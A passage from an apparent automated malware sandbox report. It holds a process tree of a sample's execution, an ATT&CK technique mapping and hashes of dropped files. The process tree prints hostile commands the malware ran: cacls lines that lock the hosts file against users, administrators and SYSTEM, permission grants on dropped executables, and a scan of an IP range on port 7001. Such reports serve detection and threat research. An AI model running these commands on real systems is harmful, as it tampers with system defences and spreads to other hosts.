- Suspicious use of AdjustPrivilegeToken
PID:2904 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 5052 C:\Windows\TEMP\lubbeisit\5052.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2100 -
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\lubbeisit\abkgigiey\scan.bat2⤵PID:1108
-
C:\Windows\lubbeisit\abkgigiey\nstjgbafp.exenstjgbafp.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3556 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:1644
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4344
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3592
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3708
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1028
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4456
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3716
-
C:\Windows\SysWOW64\nslfoo.exeC:\Windows\SysWOW64\nslfoo.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1360
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F1⤵PID:4256
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:2460
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F2⤵PID:3320
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F1⤵PID:2188
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3212
-
C:\Windows\system32\cacls.execacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F2⤵PID:2976
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\euikgtl.exe1⤵PID:4904
-
C:\Windows\ime\euikgtl.exeC:\Windows\ime\euikgtl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3588
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F1⤵PID:1276
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5324
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F2⤵PID:5164
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\euikgtl.exe1⤵PID:4744
-
C:\Windows\ime\euikgtl.exeC:\Windows\ime\euikgtl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6000
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F1⤵PID:5392
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:6072
-
C:\Windows\system32\cacls.execacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F2⤵PID:5880
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.1MB
MD5e885bfa998c300cd987a8042e517d57c
SHA159f3e82899efa3a4225c1224a64781a442d70e0f
SHA256b37d2ca2bb0faff83697bdd7740033e2e82959e5d259a7d75dcb1876d090b661
SHA5121fb57a9c5278331db17cbe18686c490a25cd2e5fa4ca55d84062af3afb5fb5355d1470c76e772f74f1ab4f96e30e2bbc67d4cf5b71629ed94ba5b009475fba1a
-
Filesize
26.1MB
MD533d1cf6d690d263bf8f99acc905da3ca
SHA11465cea09e11db53ec7eb4f33cb9dc5f6e51be92
SHA2566dbc5e5e2bdc5a121242e70e4aad03735976aa260a731e9bc199f3909c732626
SHA5126255b2e84e4467b038ef81ae65df5620cc45fd48fe0ec259f8b3f34140352e3d701c1d3b7e1dff8c859e070c8f3ffdc05920a3a4dad289ad489bc2a44c99f1e5
-
Filesize
3.9MB
MD5a16f5996834cf6febc3f4893c2b8ef00
SHA1d605c42092824ad17c04c52967300708e7f9bd63
SHA256e16590632dd014b571e87e1be749decab0f5c2132576ebfdb55cf0077b185eaf
SHA512c00f710244f8029c3f36ff0f37300cfca3519725cb61021a487f918523f6a33cbfe51aad56b10f1ae567955f2ed08f0d68429f0fb3de9bf3191683a654f09555
-
Filesize
2.9MB
MD51db1eb50fe1e84241ef96aa1f309bda8
SHA1d35005c321e6401f26256a2be6b21aea1ed11348
SHA256f12c20760f36f9bb074301d935d01588436243c4240011750fc86ad283d5bb16
SHA512365c04bdf8518b2d04621d14c6a34de4132e2602d8b0fb9be2e65db09d25025fcdd7d8f51cb4c472ac1d0b8a16cdc91ea30a0f13bb4dc0ea226c2d731c5feb2d
-
Filesize
7.6MB
MD5edda65340b36974c852ab8d239b75478
SHA1046852ac29ee7a1b2566973c6924b745274e82c7
SHA256b5838208caca8f799d0e4dda2cb6875158410372b574d5d882ad34848f5c6edf
SHA5129ba502431dc7f8bf6e2a002d2ff726dd81bcbf96df8bb347872140345de8319d89d0f521a900defeeccc2fbca1ca2c19be8f5b3b15d94aaa84baad0b5449b332
-
Filesize
818KB
MD593152504202a0bafc1bc035a6966b353
SHA178f7dce27a45ee6dc9162e3c15dd467f45b242c4
SHA25691b775cb1da72af62a70a7b1d2857f7a50d2974de3bece827aa9f2c609c50d55
SHA5123bd3caac64814b87ee78c91fbb43779381d09a13ff3aa51813dc4b98131595fa1f902b98814f1a13c68dd69e03ca535843b0454d0b499f54dbf70f02f10d2a1c
-
Filesize
2.6MB
MD588c7ab4d079f82c1e2237ffefc721e83
SHA176456d240cb864f01b365770de5608ad89dc8aca
SHA256a1724e75d4ca813e361153fc24385d1aedbfa328caa20d99dc9baacca523faee
SHA512e6b8d869fdf015a35fdb8a2cd6dbdc7fe32603ad6e94830394f02658a5692694e479791327e449b979c069e7e560946d49d9f45ff3e2370a3db557c16123316a
-
Filesize
20.5MB
MD52bce152b3aa213e71869fba7965b3ec9
SHA173dfcb574f76a53053bd57f791fa23e014c2c1b8
SHA25632f0a4c5c851e4d9835ef8847a5a62d01fbe5e74b207c09746ec2688d24943b9
SHA51232aaab0247af3b2efd44b74083a590babc3a7f59ecc1ec2c8a10a4baae8c656c1ed103a5f811603e721a825d8fbfa87e1204a291ab2792af6cce7c8a7e50812e
-
Filesize
4.4MB
MD5f2762f3910d99851b1264ec3a387ecfc
SHA176aec9cd62e85c1bbf889ee665e2937648742450
SHA2565ef9b3dd58676e26b33094b4e2c92138f5385f539271d1fffcfa754c5f173257
SHA512650dff1a0d3c27448e108cc5080c371f5b5c40f829fc00a645bcda0a4fe1a319a67f475366b31561d5af514220eba354a9da779796c81e9474ea91e23a58369e
-
Filesize
45.5MB
MD53481f4dcc5a83dc0206c1cbd9aebd614
SHA1e26f43f0db5f25f884a4fa58e33216240cefe517
SHA2565bb07e2be9ed52832ab424e9215cb3a11f43809fda1fc266dc01976bc224f7bb
SHA512c6103f1fdc665ac57ede59594224a8889382b0e0f3e403f80de00c60f0ab11396993cd655abc29bd96522aec960ecd5e716368de27cdadbdab7bf915ebf1aeb8
-
Filesize
1.2MB
MD5776b54f116ef193ff8d7c1e0a40c0312
SHA15c554b8437c5290b01df705eb32b42eaca6656d7
SHA2560031de76fa9c107351df7f1683b9fb60c22070af88edf690d2a3c89dafdbc282
SHA51299a3aed2c4c5abd58ac0e542965cdaaa9d38f1326d7ab996ad81f58f87ae0a81196bee5bb703121700fa230c2c5a8ca600b5434adb5ff10982f1ecb911b5fcf8
-
Filesize
33.6MB
MD591d11b48dd02ea36e42e7c5ce02d5a9b
SHA136b135bdbe998a589ba55eb4fc0dcd5ae07c9d01
SHA256d2a4c3697e4d12d3c9549bc9369bddb840a0ba28af86e5866c461912f35b7f08
SHA512aa592701e50111871c91fd8d57daccd3e1f4b9257402610450b73d697005f3659595320701548ca0c661250bfae642847eafd15e6144052961f36ee0e7b341b7
-
Filesize
1019KB
MD569a551effa7017d6df22ba906c9432ca
SHA120b22289b42f49bd3eca8fe20cd1738bbd180aef
SHA256cfc7f664c0a9de81810242b670f14a1b6638d08107117f386fd775d0fb0def4a
SHA512afc078cdafbe515abd8ab2800ab57c74225e3a1593d38d9edb1a214a1428f2af45f78a044212e1d084d0d6a8bc0bf50b848b9e1e8a4a2738234d2309d3dfe396
-
Filesize
8.9MB
MD55fcab98828fe666ae7d56a6788f5f098
SHA19d3619c05b3284587c1254f7310ad2d53904f61f
SHA2565be52ff90f2c257665967927a046f532d5b296c27913baf54adfa20525f826ef
SHA512001dcf2804a1a63d71f400b5c7ddd9ee887a950d3ab9d3d6e4720e4195b48bb7206750c7bb908c13221d5d929c5778ee3e67e7a44c8a163fbd439587087c13df
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
8.6MB
MD5c47303078cbdfb120d8cacae3ee233bc
SHA11a49977df13822a4dfb0edc4dc69fa65cfe888da
SHA256389fd89c104ff5225e2ffaccb335200e5ef676fd6202e0e585771574e377028b
SHA5124e272ddbe7d821efe69c751a33e9489fb46d569a314a26b6e6ce8c803415101cffb9d088fa465a5c3bd37105d5f25ead844bcecf100677b75fe9550677c94d85
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376